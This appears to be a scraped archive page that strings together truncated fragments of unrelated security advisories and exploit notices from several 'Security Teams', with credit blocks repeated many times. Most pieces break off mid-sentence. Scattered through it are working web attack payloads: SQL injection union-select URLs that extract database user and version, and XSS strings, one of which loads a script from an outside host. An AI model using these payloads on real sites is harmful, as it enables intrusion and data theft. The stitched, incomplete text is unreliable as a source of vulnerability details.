Next Page >>
Security Team
=== Problem Description ===
Because of a not sufficiently secure default value of the TYPO3 configuration variable fileDenyPattern, TYPO3 is susceptible to the following vulnerabilities when running on Apache web server:
1. Authenticated backend users with granted access to an arbitrary filemount are able to upload Apache configuration files (.htaccess). A malicious backend user may abuse this to create and execute files containing arbitrary code.
2. If the Apache module mod_mime is enabled on the Apache web server (default case), authenticated backend users with granted access to an arbitrary filemount can upload/create and execute arbitrary files with PHP code. The same applies to frontend users in the case that TYPO3 extensions with frontend plugins rely on t3lib_div::verifyFilenameAgainstDenyPattern() to check the validity of the file name. The TYPO3 security team is aware of a number of popular TYPO3 extensions that use this method. Besides that, TYPO3 extensions that process file uploads using the method processFiles() of the core library fe_adminLib.inc would also be vulnerable. The TYPO3 Security Team is not aware of an existing TYPO3 extension within the TYPO3 extension repository (TER) that uses the method processFiles().
=== Solution ===
Update to the TYPO3 versions 4.1.7 or 4.2.1 that fix the issues described. The new versions contain an updated default value for fileDenyPattern. If this default value is not used, there will be a warning displayed in backend module "About modules". This should remind the administrator to change the value of fileDenyPattern.
If you can't update directly, change the value of the configuration variable fileDenyPattern to the following value:
Microsoft Windows Server 2008 SP2
Impact:
======
NSFOCUS Security Team discovered a remote DoS vulnerability in Microsoft
Windows kernel. Carefully crafted PE file might crash the operating system.
Description:
==========
UiTV UiPlayer UiCheck.dll 1.0.0.7
Impact:
======
NSFOCUS Security Team discovered a stack buffer overflow vulnerability in
UiPlayer which allows remote attackers to run arbitrary code on user system
by crafting a malicious webpage.
Description:
==========
Microsoft Internet Explorer 8
Impact:
======
NSFOCUS Security Team discovered a security vulnerability in Microsoft
Internet Explorer. This flaw could be used to corrupt memory resulting in
application crash and possible code execution by convincing users to open
specially crafted HTML files.
IBM DB2 Universal Database v8.1 Fixpak 18
Impact:
======
NSFOCUS Security Team discovered a remote DoS vulnerability in IBM DB2, which
will cause IBM DB2 JDBC Applet Server to exit due to out-of-bound access by
sending carefully crafted data to the Server.
Description:
==========
Services Management protocol (WS-Management). It is installed and
running by default. It is used in the VMware Management Service
Console and in ESXi.
The openwsman 2.0.0 management service on ESX 3.5 and ESXi 3.5 is
vulnerable to the following issue found by the SuSE Security-Team:
- Two remote buffer overflows while decoding the HTTP basic
authentication header
This vulnerability could potentially be exploited by users without
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
Summary
=========
NSFOCUS Security Team discovered a remote buffer overflow vulnerability in
Cisco Security Agent for Windows which allows remote code execution by sending
a malicious SMB request.
Description
============
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
====================
Disclosure Timeline
====================
02-Nov-2011 - informed Security Team (security@tikiwiki.org)
03-Nov-2011 - feedback from vendor
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)
========
Credits
# #
# class : remote #
# #
# E-mail: cseye_ut@yahoo.com #
# #
# greetz: C.S.Eye Security Team members #
# #
# We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety & All Iranian Hackers #
# #
# Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com #
#####################################################################################
[Greetz]
DcLabs Security Research Group.
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
Joomla! Security Team has confirmed that this issue will not be fixed.
>> While noted, your exploit report does not fall within the JSST remit as
>> we no longer support J1.0.x branch (as you are aware and indicate).
>> The vulnerability mentioned is not known to exist in any current supported release.
>> Please ensure you are using the latest version of Joomla!
The advisory has been updated with vendor's response:
#
www.site.com/news.php?id=-999/**/union/**/select/**/1,concat_ws(CHAR(32,58,32),user(),database(),version()),3,4,5,6--
#
####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),
Ajax Security Team
*****************************************
######VULN IN HERE##################
/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)
*****************************************
###################################
#Admin Page:
#http://www.Site.com/admin
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
-------------------
Credit
-----------------------
This bug was discovered by Tavis Ormandy and Julien Tinnes of the Google
Security Team.
#<script src=http://md-r00t.persiangig.com/xpl/XSS.JS></script>
#-------------
#http://www.Site.com/links.php?cat_id=28&cat_name=[Xss]
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
====================
Disclosure Timeline
====================
16-Nov-2011 - informed Security Team (security@tikiwiki.org)
19-Dec-2011 - fixed by vendor
========
Credits
========
Affected: 2007.0, 2007.1, Corporate 4.0
_______________________________________________________________________
Problem Description:
Sebastian Krahmer of the SUSE Security Team discovered an off-by-one
buffer overflow within rsync. It is not clear if this problem is
exploitable, however updates are available to correct the issue.
_______________________________________________________________________
References:
#Example:
#
http://www.Site.com/index.php?page=headline&id=195 and 1=2 Union select1,2,concat(user(),char(58,58,58),version()),4
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
#Example:
#
#http://www.Site.com/[page]/product_info.php?products_id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
>
--
Scott Nielsen
USU IT Security Team
(435) 797-1804
========
Credits:
========
Vulnerabilities found and advisory written by INFOSERVE Security Team
===========
References:
===========
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).
===========
References:
===========
Next Page>>
|
